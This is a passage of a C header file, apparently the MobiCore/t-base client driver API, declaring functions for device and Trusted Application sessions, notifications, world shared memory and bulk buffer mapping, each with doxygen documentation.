MC_INFINITE_TIMEOUT_INTERRUPTIBLE ((int32_t)(-2)) /**< Wait infinite for a response of the MC, exit on signal. */ 191 | #define MC_NO_TIMEOUT 0 /**< Do not wait for a response of the MC. */ 192 | #define MC_MAX_TCI_LEN 0x100000 /**< TCI/DCI must not exceed 1MiB */ 193 | 194 | #ifndef WIN32 195 | /* Mark only the following functions for export */ 196 | #pragma GCC visibility push(default) 197 | #endif 198 | 199 | /** Open a new connection to a t-base device. 200 | * 201 | * mcOpenDevice() initializes all device specific resources required to communicate 202 | * with an t-base instance located on the specified device in the system. If the device 203 | * does not exist the function will return MC_DRV_ERR_UNKNOWN_DEVICE. 204 | * 205 | * @param [in] deviceId Identifier for the t-base device to be used. MC_DEVICE_ID_DEFAULT refers to the default device. 206 | * 207 | * @return MC_DRV_OK if operation has been successfully completed. 208 | * @return MC_DRV_ERR_INVALID_OPERATION if device already opened. 209 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 210 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when deviceId is unknown. 211 | * @return MC_DRV_ERR_INVALID_DEVICE_FILE if kernel module under /dev/mobicore cannot be opened 212 | * 213 | * Uses a Mutex. 214 | */ 215 | __MC_CLIENT_LIB_API mcResult_t mcOpenDevice( 216 | uint32_t deviceId 217 | ); 218 | 219 | /** Close the connection to a t-base device. 220 | * When closing a device, active sessions have to be closed beforehand. 221 | * Resources associated with the device will be released. 222 | * The device may be opened again after it has been closed. 223 | * 224 | * @param [in] deviceId Identifier for the t-base device. MC_DEVICE_ID_DEFAULT refers to the default device. 225 | * 226 | * @return MC_DRV_OK if operation has been successfully completed. 227 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id is invalid. 228 | * @return MC_DRV_ERR_SESSION_PENDING when a session is still open. 229 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 230 | * 231 | * Uses a Mutex. 232 | */ 233 | __MC_CLIENT_LIB_API mcResult_t mcCloseDevice( 234 | uint32_t deviceId 235 | ); 236 | 237 | /** Open a new session to a Trusted Application. The Trusted Application with the given UUID has to be available in the flash filesystem. 238 | * 239 | * Write MCP open message to buffer and notify t-base about the availability of a new command. 240 | * Waits till t-base responds with the new session ID (stored in the MCP buffer). 241 | * 242 | * @param [in,out] session On success, the session data will be returned. Note that session.deviceId has to be the device id of an opened device. 243 | * @param [in] uuid UUID of the Trusted Application to be opened. 244 | * @param [in] tci TCI buffer for communicating with the Trusted Application. 245 | * @param [in] tciLen Length of the TCI buffer. Maximum allowed value is MC_MAX_TCI_LEN. 246 | * 247 | * @return MC_DRV_OK if operation has been successfully completed. 248 | * @return MC_DRV_INVALID_PARAMETER if session parameter is invalid. 249 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id is invalid. 250 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon socket occur. 251 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when daemon returns an error. 252 | * @return MC_DRV_ERR_TRUSTED_APPLICATION_NOT_FOUND when Trusted Application or driver cannot be loaded. 253 | * 254 | * Uses a Mutex. 255 | */ 256 | __MC_CLIENT_LIB_API mcResult_t mcOpenSession( 257 | mcSessionHandle_t *session, 258 | const mcUuid_t *uuid, 259 | uint8_t *tci, 260 | uint32_t tciLen 261 | ); 262 | 263 | /** Open a new session to a Trusted Application(Trustlet). The Trusted Application will be loaded from the memory buffer. 264 | * 265 | * Write MCP open message to buffer and notify t-base about the availability of a new command. 266 | * Waits till t-base responds with the new session ID (stored in the MCP buffer). 267 | * 268 | * @param [in,out] session On success, the session data will be returned. Note that session.deviceId has to be the device id of an opened device. 269 | * @param [in] spid Service Provider ID(for Service provider trustlets otherwise ignored) 270 | * @param [in] trustedapp memory buffer containing the Trusted Application binary 271 | * @param [in] tlen length of the memory buffer containing the Trusted Application 272 | * @param [in] tci TCI buffer for communicating with the Trusted Application. 273 | * @param [in] tciLen Length of the TCI buffer. Maximum allowed value is MC_MAX_TCI_LEN. 274 | * 275 | * @return MC_DRV_OK if operation has been successfully completed. 276 | * @return MC_DRV_INVALID_PARAMETER if session parameter is invalid. 277 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id is invalid. 278 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon socket occur. 279 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when daemon returns an error. 280 | * @return MC_DRV_ERR_TRUSTED_APPLICATION_NOT_FOUND when Trusted Application cannot be loaded. 281 | * 282 | * Uses a Mutex. 283 | */ 284 | __MC_CLIENT_LIB_API mcResult_t mcOpenTrustlet( 285 | mcSessionHandle_t *session, 286 | mcSpid_t spid, 287 | uint8_t *trustedapp, 288 | uint32_t tLen, 289 | uint8_t *tci, 290 | uint32_t tciLen 291 | ); 292 | 293 | 294 | /** Close a Trusted Application session. 295 | * 296 | * Closes the specified t-base session. The call will block until the session has been closed. 297 | * 298 | * @pre Device deviceId has to be opened in advance. 299 | * 300 | * @param [in] session Session to be closed. 301 | * 302 | * @return MC_DRV_OK if operation has been successfully completed. 303 | * @return MC_DRV_INVALID_PARAMETER if session parameter is invalid. 304 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 305 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 306 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 307 | * @return MC_DRV_ERR_INVALID_DEVICE_FILE when daemon cannot open trustlet file. 308 | * 309 | * Uses a Mutex. 310 | */ 311 | __MC_CLIENT_LIB_API mcResult_t mcCloseSession( 312 | mcSessionHandle_t *session 313 | ); 314 | 315 | /** Notify a session. 316 | * Notifies the session end point about available message data. 317 | * If the session parameter is correct, notify will always succeed. 318 | * Corresponding errors can only be received by mcWaitNotification(). 319 | * @pre A session has to be opened in advance. 320 | * 321 | * @param session The session to be notified. 322 | * 323 | * @return MC_DRV_OK if operation has been successfully completed. 324 | * @return MC_DRV_INVALID_PARAMETER if session parameter is invalid. 325 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 326 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 327 | */ 328 | __MC_CLIENT_LIB_API mcResult_t mcNotify( 329 | mcSessionHandle_t *session 330 | ); 331 | 332 | /** Wait for a notification. 333 | * 334 | * Wait for a notification issued by t-base for a specific session. 335 | * The timeout parameter specifies the number of milliseconds the call will wait for a notification. 336 | * If the caller passes 0 as timeout value the call will immediately return. If timeout value is below 0 the call will block 337 | * until a notification for the session has been received. 338 | * 339 | * @attention if timeout is below 0, call will block: 340 | * Caller has to trust the other side to send a notification to wake him up again. 341 | * 342 | * @param [in] session The session the notification should correspond to. 343 | * @param [in] timeout Time in milliseconds to wait (MC_NO_TIMEOUT : direct return, > 0 : milliseconds, MC_INFINITE_TIMEOUT : wait indefinitely, MC_INFINITE_TIMEOUT_INTERRUPTIBLE : wait indefinitely except if signal received) 344 | * 345 | * @return MC_DRV_OK if notification is available. 346 | * @return MC_DRV_ERR_TIMEOUT if no notification arrived in time. 347 | * @return MC_DRV_INFO_NOTIFICATION if a problem with the session was encountered. Get more details with mcGetSessionErrorCode(). 348 | * @return MC_DRV_ERR_NOTIFICATION if a problem with the socket occurred. 349 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 350 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 351 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 352 | */ 353 | __MC_CLIENT_LIB_API mcResult_t mcWaitNotification( 354 | mcSessionHandle_t *session, 355 | int32_t timeout 356 | ); 357 | 358 | /** 359 | * Allocate a block of world shared memory (WSM). 360 | * The MC driver allocates a contiguous block of memory which can be used as WSM. 361 | * This implicates that the allocated memory is aligned according to the alignment parameter. 362 | * Always returns a buffer of size WSM_SIZE aligned to 4K. 363 | * 364 | * @param [in] deviceId The ID of an opened device to retrieve the WSM from. 365 | * @param [in] align The alignment (number of pages) of the memory block (e.g. 0x00000001 for 4kB). 366 | * @param [in] len Length of the block in bytes. 367 | * @param [out] wsm Virtual address of the world shared memory block. 368 | * @param [in] wsmFlags Platform specific flags describing the memory to be allocated. 369 | * 370 | * @attention: align and wsmFlags are currently ignored 371 | * 372 | * @return MC_DRV_OK if operation has been successfully completed. 373 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 374 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id is invalid. 375 | * @return MC_DRV_ERR_NO_FREE_MEMORY if no more contiguous memory is available in this size or for this process. 376 | * 377 | * Uses a Mutex. 378 | */ 379 | __MC_CLIENT_LIB_API mcResult_t mcMallocWsm( 380 | uint32_t deviceId, 381 | uint32_t align, 382 | uint32_t len, 383 | uint8_t **wsm, 384 | uint32_t wsmFlags 385 | ); 386 | 387 | /** 388 | * Free a block of world shared memory (WSM). 389 | * The MC driver will free a block of world shared memory (WSM) previously allocated with 390 | * mcMallocWsm(). The caller has to assure that the address handed over to the driver 391 | * is a valid WSM address. 392 | * 393 | * @param [in] deviceId The ID to which the given address belongs. 394 | * @param [in] wsm Address of WSM block to be freed. 395 | * 396 | * @return MC_DRV_OK if operation has been successfully completed. 397 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 398 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id is invalid. 399 | * @return MC_DRV_ERR_FREE_MEMORY_FAILED on failures. 400 | * 401 | * Uses a Mutex. 402 | */ 403 | __MC_CLIENT_LIB_API mcResult_t mcFreeWsm( 404 | uint32_t deviceId, 405 | uint8_t *wsm 406 | ); 407 | 408 | /** 409 | * Map additional bulk buffer between a Client Application (CA) and the Trusted Application (TA) for a session. 410 | * Memory allocated in user space of the CA can be mapped as additional communication channel 411 | * (besides TCI) to the Trusted Application. Limitation of the Trusted Application memory structure apply: only 6 chunks can be mapped 412 | * with a maximum chunk size of 1 MiB each. 413 | * 414 | * @attention It is up to the application layer (CA) to inform the Trusted Application about the additional mapped bulk memory. 415 | * 416 | * @param [in] session Session handle with information of the deviceId and the sessionId. The 417 | * given buffer is mapped to the session specified in the sessionHandle. 418 | * @param [in] buf Virtual address of a memory portion (relative to CA) to be shared with the Trusted Application, already includes a possible offset! 419 | * @param [in] len length of buffer block in bytes. 420 | * @param [out] mapInfo Information structure about the mapped Bulk buffer between the CA (NWd) and 421 | * the TA (SWd). 422 | * 423 | * @return MC_DRV_OK if operation has been successfully completed. 424 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 425 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 426 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 427 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 428 | * @return MC_DRV_ERR_BULK_MAPPING when buf is already uses as bulk buffer or when registering the buffer failed. 429 | * 430 | * Uses a Mutex. 431 | */ 432 | __MC_CLIENT_LIB_API mcResult_t mcMap( 433 | mcSessionHandle_t *session, 434 | void *buf, 435 | uint32_t len, 436 | mcBulkMap_t *mapInfo 437 | ); 438 | 439 | /** 440 | * Remove additional mapped bulk buffer between Client Application (CA) and the Trusted Application (TA) for a session. 441 | * 442 | * @attention The bulk buffer will immediately be unmapped from the session context. 443 | * @attention The application layer (CA) must inform the TA about unmapping of the additional bulk memory before calling mcUnmap! 444 | * 445 | * @param [in] session Session handle with information of the deviceId and the sessionId. The 446 | * given buffer is unmapped from the session specified in the sessionHandle. 447 | * @param [in] buf Virtual address of a memory portion (relative to CA) shared with the TA, already includes a possible offset! 448 | * @param [in] mapInfo Information structure about the mapped Bulk buffer between the CA (NWd) and 449 | * the TA (SWd). 450 | * @attention The clientlib currently ignores the len field in mapInfo. 451 | * 452 | * @return MC_DRV_OK if operation has been successfully completed. 453 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 454 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 455 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 456 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 457 | * @return MC_DRV_ERR_BULK_UNMAPPING when buf was not registered earlier or when unregistering failed. 458 | * 459 | * Uses a Mutex. 460 | */ 461 | __MC_CLIENT_LIB_API mcResult_t mcUnmap( 462 | mcSessionHandle_t *session, 463 | void *buf, 464 | mcBulkMap_t *mapInfo 465 | ); 466 | 467 | /** 468 | * Get additional error information of the last error that occurred on a session. 469 | * After the request the stored error code will be deleted. 470 | * 471 | * @param [in] session Session handle with information of the deviceId and the sessionId. 472 | * @param [out] lastErr >0 Trusted Application has terminated itself with this value, <0 Trusted Application is dead because of an error within t-base (e.g. Kernel exception). 473 | * See also notificationPayload_t enum in MCI definition at "mcinq.h". 474 | * 475 | * @return MC_DRV_OK if operation has been successfully completed. 476 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 477 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 478 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 479 | */ 480 | __MC_CLIENT_LIB_API mcResult_t mcGetSessionErrorCode( 481 | mcSessionHandle_t *session, 482 | int32_t *lastErr 483 | ); 484 | 485 | /** 486 | * Get t-base version information of a device. 487 | * 488 | * @param [in] deviceId of an open device. 489 | * @param [out] versionInfo t-base version info. 490 | * 491 | * @return MC_DRV_OK if operation has been successfully completed. 492 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device is not open. 493 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 494 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 495 | */ 496 | __MC_CLIENT_LIB_API mcResult_t mcGetMobiCoreVersion( 497 | uint32_t deviceId, 498 | mcVersionInfo_t *versionInfo 499 | ); 500 | #ifndef WIN32 501 | #pragma GCC visibility pop 502 | #endif 503 | #endif /** MCDRIVER_H_ */ 504 | 505 | --------------------------------------------------------------------------------